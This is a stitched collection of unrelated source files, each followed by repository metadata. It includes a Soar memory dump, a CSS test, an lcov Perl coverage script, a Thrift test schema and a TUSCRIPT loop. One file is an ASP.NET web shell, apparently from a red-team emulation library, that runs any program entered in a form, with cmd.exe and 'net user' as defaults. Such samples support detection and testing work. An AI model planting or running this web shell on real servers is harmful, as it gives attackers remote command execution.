clean-up-retrieved-stack SOAR_ID 184 SOAR_ID 185 SOAR_ID 190 SOAR_ID 191 SOAR_ID 188 ENUMERATION 189 1 comprehend-construction SOAR_ID 178 ENUMERATION 179 1 index-scene-objects-demonstrative SOAR_ID 176 ENUMERATION 177 1 index-scene-objects-definitive SOAR_ID 182 ENUMERATION 183 1 index-scene-object-personal SOAR_ID 180 ENUMERATION 181 1 index-scene-objects-indefinite SOAR_ID 205 ENUMERATION 204 1 comprehend-completion SOAR_ID 207 ENUMERATION 206 1 smem-lexical-retrieval-cw-pw SOAR_ID 201 ENUMERATION 200 1 remove-stale-assigner SOAR_ID 203 ENUMERATION 202 1 snip SOAR_ID 197 ENUMERATION 196 1 word-pairs SOAR_ID 199 ENUMERATION 198 1 remove-stale-receiver ENUMERATION 193 1 comprehend-construction ENUMERATION 192 1 state SOAR_ID 195 ENUMERATION 194 1 smem-construction-retrieval SOAR_ID 220 SOAR_ID 221 ENUMERATION 222 2 true true SOAR_ID 223 SOAR_ID 216 SOAR_ID 217 SOAR_ID 218 SOAR_ID 219 ENUMERATION 212 1 t ENUMERATION 213 2 internal external SOAR_ID 214 SOAR_ID 215 ENUMERATION 208 1 next-retrieved-stack SOAR_ID 209 SOAR_ID 210 SOAR_ID 211 ENUMERATION 239 0 SOAR_ID 238 ENUMERATION 237 1 true ENUMERATION 236 2 true true ENUMERATION 235 2 prior-word prior-word SOAR_ID 234 ENUMERATION 233 2 word word ENUMERATION 232 1 nil ENUMERATION 231 1 nil SOAR_ID 230 SOAR_ID 229 SOAR_ID 228 SOAR_ID 227 SOAR_ID 226 SOAR_ID 225 SOAR_ID 224 SOAR_ID 246 ENUMERATION 247 2 no-change tie SOAR_ID 244 SOAR_ID 245 SOAR_ID 242 SOAR_ID 243 ENUMERATION 240 0 SOAR_ID 241 265 4 name 8 0 operator 88 118 operator 197 140 name 141 125 superstate 61 0 top-state 0 125 operator 135 69 name 68 125 operator 131 103 name 102 34 operator 85 147 name 149 170 operator 174 101 name 100 0 problem-space 17 13 retrieved-lexical-item 43 0 operator 185 97 operator 101 215 prior 231 88 name 89 92 operator 105 139 name 138 191 superstate 142 161 operator 184 0 operator 9 219 words 235 170 quiescence 212 174 name 173 190 name 189 72 name 73 116 name 117 161 operator 167 215 item 216 142 operator 146 129 name 128 0 name 7 161 operator 180 24 current-word 13 38 word 13 219 new-word 227 133 name 132 44 failure 46 17 one-level-attributes 21 180 name 179 215 prior 217 39 result 44 125 operator 139 0 operator 55 165 name 164 86 name 87 147 operator 153 79 name 78 214 failed-construction 237 9 name 10 147 top-state 0 142 operator 190 34 top-state 0 223 structure-type 240 122 name 121 0 input-sentence 13 147 type 148 161 type 162 114 name 115 156 name 158 214 retrieved-stack 215 191 name 193 199 name 198 90 name 91 191 operator 199 219 not-merged-receiver 220 0 operator 86 131 name 130 184 name 183 191 operator 195 92 top-state 0 223 structure-type 239 219 failed 236 185 name 186 0 operator 80 61 name 63 142 operator 203 0 operator 72 156 superstate 147 205 name 204 13 next 13 34 operator 54 0 required-success 29 0 current-word 13 170 superstate 147 241 merged-receiver 244 13 processed 26 156 operator 160 182 name 181 109 name 108 214 not-merged-assigner 223 0 operator 82 0 assigner 241 188 name 187 147 operator 151 105 name 104 118 type 119 17 two-level-attributes 18 58 name 57 34 smem 39 13 spelling 14 125 operator 133 24 name 25 92 name 94 0 semantics 22 34 name 36 176 assigner 246 85 name 84 160 name 159 214 comprehension-structure 219 219 remove-assigner 230 31 reward 32 176 name 175 118 top-state 0 167 name 166 34 operator 52 80 name 81 0 current-word 27 170 name 172 195 name 194 97 superstate 92 219 type 233 0 reward-link 31 110 name 111 219 new-word 226 147 top-state 211 191 operator 201 147 operator 155 137 name 136 97 type 98 191 type 192 0 syntax 23 82 name 83 161 top-state 0 54 name 53 75 name 74 1 output-link 3 97 top-state 0 61 operator 65 0 segment 214 170 type 171 125 name 127 125 top-state 0 34 superstate 142 142 type 143 161 operator 182 59 name 60 0 operator 112 76 name 77 112 name 113 125 operator 137 155 name 154 0 operator 24 0 operator 140 161 operator 165 96 name 95 125 operator 129 0 world-usage 213 178 name 177 201 name 200 52 name 51 34 operator 107 44 retrieved 45 61 operator 67 34 operator 75 39 command 40 142 operator 209 214 current-word 238 0 operator 90 0 operator 110 118 name 120 214 merged-assigner 242 34 operator 207 214 merged-receiver 243 0 operator 76 219 remove-receiver 229 0 desired 16 197 name 196 50 name 49 147 operator 188 0 operator 4 214 semantics 225 34 operator 50 13 next 15 67 name 66 161 name 163 191 top-state 0 40 query 41 118 operator 122 118 superstate 0 217 item 218 70 name 71 34 operator 109 0 operator 70 34 operator 124 151 name 150 161 superstate 147 48 name 47 125 type 126 0 operator 11 17 default-state-copy 19 107 name 106 11 name 12 55 name 56 203 name 202 142 operator 205 38 name 37 0 io 1 0 operator 59 217 prior 234 142 superstate 0 107 receiver 245 92 superstate 142 1 input-link 2 225 new-word 228 17 name 20 153 name 152 34 operator 38 92 operator 96 61 operator 69 147 operator 169 97 name 99 41 spelling 42 170 top-state 0 0 superstate 6 142 top-state 0 92 type 93 146 name 145 0 operator 114 34 type 35 169 name 168 219 not-merged-assigner 224 156 type 157 135 name 134 61 top-state 0 97 operator 103 214 not-merged-receiver 221 209 name 208 156 top-state 0 124 name 123 147 superstate 142 34 operator 48 207 name 206 170 operator 176 61 superstate 142 61 operator 79 34 retrieved-lexical-item 43 32 value 33 34 operator 58 0 success 30 61 type 62 65 name 64 72 next-sentence-number 210 142 name 144 0 type 5 0 impasse 247 34 current-word 13 0 operator 116 219 processed 222 161 operator 178 0 input-sentence 28
DM
1
amininger/rosie
agent/language-comprehension/mNL-Soar.dm
[ "BSD-3-Clause" ]
--- title: Title description: Description # This is a comment --- a { color: red; }
CSS
2
fuelingtheweb/prettier
tests/css_yaml/with_comments.css
[ "MIT" ]
#!/usr/bin/perl -w # # Copyright (c) International Business Machines Corp., 2002 # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or (at # your option) any later version. # # This program is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA # # # genflat # # This script generates std output from .info files as created by the # geninfo script. Call it with --help to get information on usage and # available options. This code is based on the lcov genhtml script # by Peter Oberparleiter <[email protected]> # # # History: # 2003-08-19 ripped up Peter's script James M Kenefick Jr. <[email protected]> # use strict; use File::Basename; use Getopt::Long; # Constants our $lcov_version = ""; our $lcov_url = ""; # Specify coverage rate limits (in %) for classifying file entries # HI: $hi_limit <= rate <= 100 graph color: green # MED: $med_limit <= rate < $hi_limit graph color: orange # LO: 0 <= rate < $med_limit graph color: red our $hi_limit = 50; our $med_limit = 15; # Data related prototypes sub print_usage(*); sub gen_html(); sub process_dir($); sub process_file($$$); sub info(@); sub read_info_file($); sub get_info_entry($); sub set_info_entry($$$$;$$); sub get_prefix(@); sub shorten_prefix($); sub get_dir_list(@); sub get_relative_base_path($); sub get_date_string(); sub split_filename($); sub subtract_counts($$); sub add_counts($$); sub apply_baseline($$); sub combine_info_files($$); sub combine_info_entries($$); sub apply_prefix($$); sub escape_regexp($); # HTML related prototypes sub write_file_table(*$$$$); # Global variables & initialization our %info_data; # Hash containing all data from .info file our $dir_prefix; # Prefix to remove from all sub directories our %test_description; # Hash containing test descriptions if available our $date = get_date_string(); our @info_filenames; # List of .info files to use as data source our $test_title; # Title for output as written to each page header our $output_directory; # Name of directory in which to store output our $base_filename; # Optional name of file containing baseline data our $desc_filename; # Name of file containing test descriptions our $css_filename; # Optional name of external stylesheet file to use our $quiet; # If set, suppress information messages our $help; # Help option flag our $version; # Version option flag our $show_details; # If set, generate detailed directory view our $no_prefix; # If set, do not remove filename prefix our $frames; # If set, use frames for source code view our $keep_descriptions; # If set, do not remove unused test case descriptions our $no_sourceview; # If set, do not create a source code view for each file our $tab_size = 8; # Number of spaces to use in place of tab our $cwd = `pwd`; # Current working directory chomp($cwd); our $tool_dir = dirname($0); # Directory where genhtml tool is installed # # Code entry point # # Add current working directory if $tool_dir is not already an absolute path if (! ($tool_dir =~ /^\/(.*)$/)) { $tool_dir = "$cwd/$tool_dir"; } # Parse command line options if (!GetOptions("output-directory=s" => \$output_directory, "css-file=s" => \$css_filename, "baseline-file=s" => \$base_filename, "prefix=s" => \$dir_prefix, "num-spaces=i" => \$tab_size, "no-prefix" => \$no_prefix, "quiet" => \$quiet, "help" => \$help, "version" => \$version )) { print_usage(*STDERR); exit(1); } @info_filenames = @ARGV; # Check for help option if ($help) { print_usage(*STDOUT); exit(0); } # Check for version option if ($version) { print($lcov_version."\n"); exit(0); } # Check for info filename if (!@info_filenames) { print(STDERR "No filename specified\n"); print_usage(*STDERR); exit(1); } # Generate a title if none is specified if (!$test_title) { if (scalar(@info_filenames) == 1) { # Only one filename specified, use it as title $test_title = basename($info_filenames[0]); } else { # More than one filename specified, used default title $test_title = "unnamed"; } } # Make sure tab_size is within valid range if ($tab_size < 1) { print(STDERR "ERROR: invalid number of spaces specified: ". "$tab_size!\n"); exit(1); } # Do something gen_html(); exit(0); # # print_usage(handle) # # Print usage information. # sub print_usage(*) { local *HANDLE = $_[0]; my $executable_name = basename($0); print(HANDLE <<END_OF_USAGE); Usage: $executable_name [OPTIONS] INFOFILE(S) Create HTML output for coverage data found in INFOFILE. Note that INFOFILE may also be a list of filenames. -h, --help Print this help, then exit -v, --version Print version number, then exit -q, --quiet Do not print progress messages -b, --baseline-file BASEFILE Use BASEFILE as baseline file -p, --prefix PREFIX Remove PREFIX from all directory names --no-prefix Do not remove prefix from directory names --no-source Do not create source code view --num-spaces NUM Replace tabs with NUM spaces in source view See $lcov_url for more information about this tool. END_OF_USAGE ; } # # gen_html() # # Generate a set of HTML pages from contents of .info file INFO_FILENAME. # Files will be written to the current directory. If provided, test case # descriptions will be read from .tests file TEST_FILENAME and included # in ouput. # # Die on error. # sub gen_html() { local *HTML_HANDLE; my %overview; my %base_data; my $lines_found; my $lines_hit; my $overall_found = 0; my $overall_hit = 0; my $dir_name; my $link_name; my @dir_list; my %new_info; # Read in all specified .info files foreach (@info_filenames) { info("Reading data file $_\n"); %new_info = %{read_info_file($_)}; # Combine %new_info with %info_data %info_data = %{combine_info_files(\%info_data, \%new_info)}; } info("Found %d entries.\n", scalar(keys(%info_data))); # Read and apply baseline data if specified if ($base_filename) { # Read baseline file info("Reading baseline file $base_filename\n"); %base_data = %{read_info_file($base_filename)}; info("Found %d entries.\n", scalar(keys(%base_data))); # Apply baseline info("Subtracting baseline data.\n"); %info_data = %{apply_baseline(\%info_data, \%base_data)}; } @dir_list = get_dir_list(keys(%info_data)); if ($no_prefix) { # User requested that we leave filenames alone info("User asked not to remove filename prefix\n"); } elsif (!defined($dir_prefix)) { # Get prefix common to most directories in list $dir_prefix = get_prefix(@dir_list); if ($dir_prefix) { info("Found common filename prefix \"$dir_prefix\"\n"); } else { info("No common filename prefix found!\n"); $no_prefix=1; } } else { info("Using user-specified filename prefix \"". "$dir_prefix\"\n"); } # Process each subdirectory and collect overview information foreach $dir_name (@dir_list) { ($lines_found, $lines_hit) = process_dir($dir_name); $overview{$dir_name} = "$lines_found,$lines_hit, "; $overall_found += $lines_found; $overall_hit += $lines_hit; } if ($overall_found == 0) { info("Warning: No lines found!\n"); } else { info("Overall coverage rate: %d of %d lines (%.1f%%)\n", $overall_hit, $overall_found, $overall_hit*100/$overall_found); } } # # process_dir(dir_name) # sub process_dir($) { my $abs_dir = $_[0]; my $trunc_dir; my $rel_dir = $abs_dir; my $base_dir; my $filename; my %overview; my $lines_found; my $lines_hit; my $overall_found=0; my $overall_hit=0; my $base_name; my $extension; my $testdata; my %testhash; local *HTML_HANDLE; # Remove prefix if applicable if (!$no_prefix) { # Match directory name beginning with $dir_prefix $rel_dir = apply_prefix($rel_dir, $dir_prefix); } $trunc_dir = $rel_dir; # Remove leading / if ($rel_dir =~ /^\/(.*)$/) { $rel_dir = substr($rel_dir, 1); } $base_dir = get_relative_base_path($rel_dir); $abs_dir = escape_regexp($abs_dir); # Match filenames which specify files in this directory, not including # sub-directories foreach $filename (grep(/^$abs_dir\/[^\/]*$/,keys(%info_data))) { ($lines_found, $lines_hit, $testdata) = process_file($trunc_dir, $rel_dir, $filename); $base_name = basename($filename); $overview{$base_name} = "$lines_found,$lines_hit"; $testhash{$base_name} = $testdata; $overall_found += $lines_found; $overall_hit += $lines_hit; } write_file_table($abs_dir, "./linux/", \%overview, \%testhash, 4); # Calculate resulting line counts return ($overall_found, $overall_hit); } # # process_file(trunc_dir, rel_dir, filename) # sub process_file($$$) { info("Processing file ".apply_prefix($_[2], $dir_prefix)."\n"); my $trunc_dir = $_[0]; my $rel_dir = $_[1]; my $filename = $_[2]; my $base_name = basename($filename); my $base_dir = get_relative_base_path($rel_dir); my $testdata; my $testcount; my $sumcount; my $funcdata; my $lines_found; my $lines_hit; my @source; my $pagetitle; ($testdata, $sumcount, $funcdata, $lines_found, $lines_hit) = get_info_entry($info_data{$filename}); return ($lines_found, $lines_hit, $testdata); } # # read_info_file(info_filename) # # Read in the contents of the .info file specified by INFO_FILENAME. Data will # be returned as a reference to a hash containing the following mappings: # # %result: for each filename found in file -> \%data # # %data: "test" -> \%testdata # "sum" -> \%sumcount # "func" -> \%funcdata # "found" -> $lines_found (number of instrumented lines found in file) # "hit" -> $lines_hit (number of executed lines in file) # # %testdata: name of test affecting this file -> \%testcount # # %testcount: line number -> execution count for a single test # %sumcount : line number -> execution count for all tests # %funcdata : line number -> name of function beginning at that line # # Note that .info file sections referring to the same file and test name # will automatically be combined by adding all execution counts. # # Note that if INFO_FILENAME ends with ".gz", it is assumed that the file # is compressed using GZIP. If available, GUNZIP will be used to decompress # this file. # # Die on error # sub read_info_file($) { my $tracefile = $_[0]; # Name of tracefile my %result; # Resulting hash: file -> data my $data; # Data handle for current entry my $testdata; # " " my $testcount; # " " my $sumcount; # " " my $funcdata; # " " my $line; # Current line read from .info file my $testname; # Current test name my $filename; # Current filename my $hitcount; # Count for lines hit my $count; # Execution count of current line my $negative; # If set, warn about negative counts local *INFO_HANDLE; # Filehandle for .info file # Check if file exists and is readable stat($_[0]); if (!(-r _)) { die("ERROR: cannot read file $_[0]!\n"); } # Check if this is really a plain file if (!(-f _)) { die("ERROR: not a plain file: $_[0]!\n"); } # Check for .gz extension if ($_[0] =~ /^(.*)\.gz$/) { # Check for availability of GZIP tool system("gunzip -h >/dev/null 2>/dev/null") and die("ERROR: gunzip command not available!\n"); # Check integrity of compressed file system("gunzip -t $_[0] >/dev/null 2>/dev/null") and die("ERROR: integrity check failed for ". "compressed file $_[0]!\n"); # Open compressed file open(INFO_HANDLE, "gunzip -c $_[0]|") or die("ERROR: cannot start gunzip to uncompress ". "file $_[0]!\n"); } else { # Open uncompressed file open(INFO_HANDLE, $_[0]) or die("ERROR: cannot read file $_[0]!\n"); } $testname = ""; while (<INFO_HANDLE>) { chomp($_); $line = $_; # Switch statement foreach ($line) { /^TN:(\w+)/ && do { # Test name information found $testname = $1; last; }; /^[SK]F:(.*)/ && do { # Filename information found # Retrieve data for new entry $filename = $1; $data = $result{$filename}; ($testdata, $sumcount, $funcdata) = get_info_entry($data); if (defined($testname)) { $testcount = $testdata->{$testname}; } else { my %new_hash; $testcount = \%new_hash; } last; }; /^DA:(\d+),(-?\d+)/ && do { # Fix negative counts $count = $2 < 0 ? 0 : $2; if ($2 < 0) { $negative = 1; } # Execution count found, add to structure # Add summary counts $sumcount->{$1} += $count; # Add test-specific counts if (defined($testname)) { $testcount->{$1} += $count; } last; }; /^FN:(\d+),([^,]+)/ && do { # Function data found, add to structure $funcdata->{$1} = $2; last; }; /^end_of_record/ && do { # Found end of section marker if ($filename) { # Store current section data if (defined($testname)) { $testdata->{$testname} = $testcount; } set_info_entry($data, $testdata, $sumcount, $funcdata); $result{$filename} = $data; } }; # default last; } } close(INFO_HANDLE); # Calculate lines_found and lines_hit for each file foreach $filename (keys(%result)) { $data = $result{$filename}; ($testdata, $sumcount, $funcdata) = get_info_entry($data); $data->{"found"} = scalar(keys(%{$sumcount})); $hitcount = 0; foreach (keys(%{$sumcount})) { if ($sumcount->{$_} >0) { $hitcount++; } } $data->{"hit"} = $hitcount; $result{$filename} = $data; } if (scalar(keys(%result)) == 0) { die("ERROR: No valid records found in tracefile $tracefile\n"); } if ($negative) { warn("WARNING: Negative counts found in tracefile ". "$tracefile\n"); } return(\%result); } # # get_info_entry(hash_ref) # # Retrieve data from an entry of the structure generated by read_info_file(). # Return a list of references to hashes: # (test data hash ref, sum count hash ref, funcdata hash ref, lines found, # lines hit) # sub get_info_entry($) { my $testdata_ref = $_[0]->{"test"}; my $sumcount_ref = $_[0]->{"sum"}; my $funcdata_ref = $_[0]->{"func"}; my $lines_found = $_[0]->{"found"}; my $lines_hit = $_[0]->{"hit"}; return ($testdata_ref, $sumcount_ref, $funcdata_ref, $lines_found, $lines_hit); } # # set_info_entry(hash_ref, testdata_ref, sumcount_ref, funcdata_ref[, # lines_found, lines_hit]) # # Update the hash referenced by HASH_REF with the provided data references. # sub set_info_entry($$$$;$$) { my $data_ref = $_[0]; $data_ref->{"test"} = $_[1]; $data_ref->{"sum"} = $_[2]; $data_ref->{"func"} = $_[3]; if (defined($_[4])) { $data_ref->{"found"} = $_[4]; } if (defined($_[5])) { $data_ref->{"hit"} = $_[5]; } } # # get_prefix(filename_list) # # Search FILENAME_LIST for a directory prefix which is common to as many # list entries as possible, so that removing this prefix will minimize the # sum of the lengths of all resulting shortened filenames. # sub get_prefix(@) { my @filename_list = @_; # provided list of filenames my %prefix; # mapping: prefix -> sum of lengths my $current; # Temporary iteration variable # Find list of prefixes foreach (@filename_list) { # Need explicit assignment to get a copy of $_ so that # shortening the contained prefix does not affect the list $current = shorten_prefix($_); while ($current = shorten_prefix($current)) { # Skip rest if the remaining prefix has already been # added to hash if ($prefix{$current}) { last; } # Initialize with 0 $prefix{$current}="0"; } } # Calculate sum of lengths for all prefixes foreach $current (keys(%prefix)) { foreach (@filename_list) { # Add original length $prefix{$current} += length($_); # Check whether prefix matches if (substr($_, 0, length($current)) eq $current) { # Subtract prefix length for this filename $prefix{$current} -= length($current); } } } # Find and return prefix with minimal sum $current = (keys(%prefix))[0]; foreach (keys(%prefix)) { if ($prefix{$_} < $prefix{$current}) { $current = $_; } } return($current); } # # shorten_prefix(prefix) # # Return PREFIX shortened by last directory component. # sub shorten_prefix($) { my @list = split("/", $_[0]); pop(@list); return join("/", @list); } # # get_dir_list(filename_list) # # Return sorted list of directories for each entry in given FILENAME_LIST. # sub get_dir_list(@) { my %result; foreach (@_) { $result{shorten_prefix($_)} = ""; } return(sort(keys(%result))); } # # get_relative_base_path(subdirectory) # # Return a relative path string which references the base path when applied # in SUBDIRECTORY. # # Example: get_relative_base_path("fs/mm") -> "../../" # sub get_relative_base_path($) { my $result = ""; my $index; # Make an empty directory path a special case if (!$_[0]) { return(""); } # Count number of /s in path $index = ($_[0] =~ s/\//\//g); # Add a ../ to $result for each / in the directory path + 1 for (; $index>=0; $index--) { $result .= "../"; } return $result; } # # get_date_string() # # Return the current date in the form: yyyy-mm-dd # sub get_date_string() { my $year; my $month; my $day; ($year, $month, $day) = (localtime())[5, 4, 3]; return sprintf("%d-%02d-%02d", $year+1900, $month+1, $day); } # # split_filename(filename) # # Return (path, filename, extension) for a given FILENAME. # sub split_filename($) { if (!$_[0]) { return(); } my @path_components = split('/', $_[0]); my @file_components = split('\.', pop(@path_components)); my $extension = pop(@file_components); return (join("/",@path_components), join(".",@file_components), $extension); } # # write_file_table(filehandle, base_dir, overview, testhash, fileview) # # Write a complete file table. OVERVIEW is a reference to a hash containing # the following mapping: # # filename -> "lines_found,lines_hit,page_link" # # TESTHASH is a reference to the following hash: # # filename -> \%testdata # %testdata: name of test affecting this file -> \%testcount # %testcount: line number -> execution count for a single test # # Heading of first column is "Filename" if FILEVIEW is true, "Directory name" # otherwise. # sub write_file_table(*$$$$) { my $dir = $_[0]; my $base_dir = $_[1]; my %overview = %{$_[2]}; my %testhash = %{$_[3]}; my $fileview = $_[4]; my $filename; my $hit; my $found; my $classification; my $rate_string; my $rate; my $junk; foreach $filename (sort(keys(%overview))) { ($found, $hit, $junk) = split(",", $overview{$filename}); #James I think this is right $rate = $hit * 100 / $found; $rate_string = sprintf("%.1f", $rate); if ($rate < 0.001) { $classification = "None"; } elsif ($rate < $med_limit) { $classification = "Lo"; } elsif ($rate < $hi_limit) { $classification = "Med"; } else { $classification = "Hi"; } print "$dir/$filename\t$classification\t$rate_string\n"; } } # # info(printf_parameter) # # Use printf to write PRINTF_PARAMETER to stdout only when the $quiet flag # is not set. # sub info(@) { if (!$quiet) { # Print info string printf(STDERR @_); } } # # subtract_counts(data_ref, base_ref) # sub subtract_counts($$) { my %data = %{$_[0]}; my %base = %{$_[1]}; my $line; my $data_count; my $base_count; my $hit = 0; my $found = 0; foreach $line (keys(%data)) { $found++; $data_count = $data{$line}; $base_count = $base{$line}; if (defined($base_count)) { $data_count -= $base_count; # Make sure we don't get negative numbers if ($data_count<0) { $data_count = 0; } } $data{$line} = $data_count; if ($data_count > 0) { $hit++; } } return (\%data, $found, $hit); } # # add_counts(data1_ref, data2_ref) # # DATA1_REF and DATA2_REF are references to hashes containing a mapping # # line number -> execution count # # Return a list (RESULT_REF, LINES_FOUND, LINES_HIT) where RESULT_REF # is a reference to a hash containing the combined mapping in which # execution counts are added. # sub add_counts($$) { my %data1 = %{$_[0]}; # Hash 1 my %data2 = %{$_[1]}; # Hash 2 my %result; # Resulting hash my $line; # Current line iteration scalar my $data1_count; # Count of line in hash1 my $data2_count; # Count of line in hash2 my $found = 0; # Total number of lines found my $hit = 0; # Number of lines with a count > 0 foreach $line (keys(%data1)) { $data1_count = $data1{$line}; $data2_count = $data2{$line}; # Add counts if present in both hashes if (defined($data2_count)) { $data1_count += $data2_count; } # Store sum in %result $result{$line} = $data1_count; $found++; if ($data1_count > 0) { $hit++; } } # Add lines unique to data2 foreach $line (keys(%data2)) { # Skip lines already in data1 if (defined($data1{$line})) { next; } # Copy count from data2 $result{$line} = $data2{$line}; $found++; if ($result{$line} > 0) { $hit++; } } return (\%result, $found, $hit); } # # apply_baseline(data_ref, baseline_ref) # # Subtract the execution counts found in the baseline hash referenced by # BASELINE_REF from actual data in DATA_REF. # sub apply_baseline($$) { my %data_hash = %{$_[0]}; my %base_hash = %{$_[1]}; my $filename; my $testname; my $data; my $data_testdata; my $data_funcdata; my $data_count; my $base; my $base_testdata; my $base_count; my $sumcount; my $found; my $hit; foreach $filename (keys(%data_hash)) { # Get data set for data and baseline $data = $data_hash{$filename}; $base = $base_hash{$filename}; # Get set entries for data and baseline ($data_testdata, undef, $data_funcdata) = get_info_entry($data); ($base_testdata, $base_count) = get_info_entry($base); # Sumcount has to be calculated anew $sumcount = {}; # For each test case, subtract test specific counts foreach $testname (keys(%{$data_testdata})) { # Get counts of both data and baseline $data_count = $data_testdata->{$testname}; $hit = 0; ($data_count, undef, $hit) = subtract_counts($data_count, $base_count); # Check whether this test case did hit any line at all if ($hit > 0) { # Write back resulting hash $data_testdata->{$testname} = $data_count; } else { # Delete test case which did not impact this # file delete($data_testdata->{$testname}); } # Add counts to sum of counts ($sumcount, $found, $hit) = add_counts($sumcount, $data_count); } # Write back resulting entry set_info_entry($data, $data_testdata, $sumcount, $data_funcdata, $found, $hit); $data_hash{$filename} = $data; } return (\%data_hash); } # # combine_info_entries(entry_ref1, entry_ref2) # # Combine .info data entry hashes referenced by ENTRY_REF1 and ENTRY_REF2. # Return reference to resulting hash. # sub combine_info_entries($$) { my $entry1 = $_[0]; # Reference to hash containing first entry my $testdata1; my $sumcount1; my $funcdata1; my $entry2 = $_[1]; # Reference to hash containing second entry my $testdata2; my $sumcount2; my $funcdata2; my %result; # Hash containing combined entry my %result_testdata; my $result_sumcount = {}; my %result_funcdata; my $lines_found; my $lines_hit; my $testname; # Retrieve data ($testdata1, $sumcount1, $funcdata1) = get_info_entry($entry1); ($testdata2, $sumcount2, $funcdata2) = get_info_entry($entry2); # Combine funcdata foreach (keys(%{$funcdata1})) { $result_funcdata{$_} = $funcdata1->{$_}; } foreach (keys(%{$funcdata2})) { $result_funcdata{$_} = $funcdata2->{$_}; } # Combine testdata foreach $testname (keys(%{$testdata1})) { if (defined($testdata2->{$testname})) { # testname is present in both entries, requires # combination ($result_testdata{$testname}) = add_counts($testdata1->{$testname}, $testdata2->{$testname}); } else { # testname only present in entry1, add to result $result_testdata{$testname} = $testdata1->{$testname}; } # update sum count hash ($result_sumcount, $lines_found, $lines_hit) = add_counts($result_sumcount, $result_testdata{$testname}); } foreach $testname (keys(%{$testdata2})) { # Skip testnames already covered by previous iteration if (defined($testdata1->{$testname})) { next; } # testname only present in entry2, add to result hash $result_testdata{$testname} = $testdata2->{$testname}; # update sum count hash ($result_sumcount, $lines_found, $lines_hit) = add_counts($result_sumcount, $result_testdata{$testname}); } # Calculate resulting sumcount # Store result set_info_entry(\%result, \%result_testdata, $result_sumcount, \%result_funcdata, $lines_found, $lines_hit); return(\%result); } # # combine_info_files(info_ref1, info_ref2) # # Combine .info data in hashes referenced by INFO_REF1 and INFO_REF2. Return # reference to resulting hash. # sub combine_info_files($$) { my %hash1 = %{$_[0]}; my %hash2 = %{$_[1]}; my $filename; foreach $filename (keys(%hash2)) { if ($hash1{$filename}) { # Entry already exists in hash1, combine them $hash1{$filename} = combine_info_entries($hash1{$filename}, $hash2{$filename}); } else { # Entry is unique in both hashes, simply add to # resulting hash $hash1{$filename} = $hash2{$filename}; } } return(\%hash1); } # # apply_prefix(filename, prefix) # # If FILENAME begins with PREFIX, remove PREFIX from FILENAME and return # resulting string, otherwise return FILENAME. # sub apply_prefix($$) { my $filename = $_[0]; my $prefix = $_[1]; my $clean_prefix = escape_regexp($prefix); if (defined($prefix) && ($prefix ne "")) { if ($filename =~ /^$clean_prefix\/(.*)$/) { return substr($filename, length($prefix) + 1); } } return $filename; } # # escape_regexp(string) # # Escape special characters in STRING which would be incorrectly interpreted # in a PERL regular expression. # sub escape_regexp($) { my $string = $_[0]; # Escape special characters $string =~ s/\\/\\\\/g; $string =~ s/\^/\\\^/g; $string =~ s/\$/\\\$/g; $string =~ s/\./\\\./g; $string =~ s/\|/\\\|/g; $string =~ s/\(/\\\(/g; $string =~ s/\)/\\\)/g; $string =~ s/\[/\\\[/g; $string =~ s/\]/\\\]/g; $string =~ s/\*/\\\*/g; $string =~ s/\?/\\\?/g; $string =~ s/\{/\\\{/g; $string =~ s/\}/\\\}/g; $string =~ s/\+/\\\+/g; return $string; }
Perl
5
seanbaxter/bde-1
tools/lcov/contrib/galaxy/genflat.pl
[ "Apache-2.0" ]
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ /* thrift --gen java:private-members,fullcamel \ -out sdks/java/io/thrift/src/test/java/ \ sdks/java/io/thrift/src/test/thrift/payload.thrift ./gradlew :sdks:java:extensions:sql:spotlessApply */ namespace java org.apache.beam.sdk.io.thrift.payloads struct TestThriftMessage { 1: required i64 f_long 2: required i32 f_int 3: required double f_double 4: required string f_string 5: required list<double> f_double_array = 5 } struct SimpleThriftMessage { 1: required i32 id 2: required string name } struct ItThriftMessage { 1: required i64 f_long 2: required i32 f_int 3: required string f_string }
Thrift
4
hengfengli/beam
sdks/java/io/thrift/src/test/thrift/payload.thrift
[ "PSF-2.0", "Apache-2.0", "BSD-3-Clause" ]
<%@ Page Language="VB" Debug="true" %> <%@ import Namespace="system.IO" %> <%@ import Namespace="System.Diagnostics" %> <script runat="server"> Sub RunCmd(Src As Object, E As EventArgs) Dim myProcess As New Process() Dim myProcessStartInfo As New ProcessStartInfo(xpath.text) myProcessStartInfo.UseShellExecute = false myProcessStartInfo.RedirectStandardOutput = true myProcess.StartInfo = myProcessStartInfo myProcessStartInfo.Arguments=xcmd.text myProcess.Start() Dim myStreamReader As StreamReader = myProcess.StandardOutput Dim myString As String = myStreamReader.Readtoend() myProcess.Close() mystring=replace(mystring,"<","&lt;") mystring=replace(mystring,">","&gt;") result.text= vbcrlf & "<pre>" & mystring & "</pre>" End Sub </script> <html> <body> <form runat="server"> <p><asp:Label id="L_p" runat="server" width="80px">Program</asp:Label> <asp:TextBox id="xpath" runat="server" Width="300px">c:\windows\system32\cmd.exe</asp:TextBox> <p><asp:Label id="L_a" runat="server" width="80px">Arguments</asp:Label> <asp:TextBox id="xcmd" runat="server" Width="300px" Text="/c net user">/c net user</asp:TextBox> <p><asp:Button id="Button" onclick="runcmd" runat="server" Width="100px" Text="Run"></asp:Button> <p><asp:Label id="result" runat="server"></asp:Label> </form> </body> </html>
ASP
3
tjgeorgen/atomic-red-team
atomics/T1505.003/src/cmd.aspx
[ "MIT" ]
$$ MODE TUSCRIPT LOOP row="" LOOP/CLEAR x=1,10 x=RANDOM_NUMBERS (1,20,1) row=APPEND(row," ",x) IF (x==20) THEN PRINT row EXIT,EXIT ENDIF ENDLOOP PRINT row ENDLOOP
Turing
3
LaudateCorpus1/RosettaCodeData
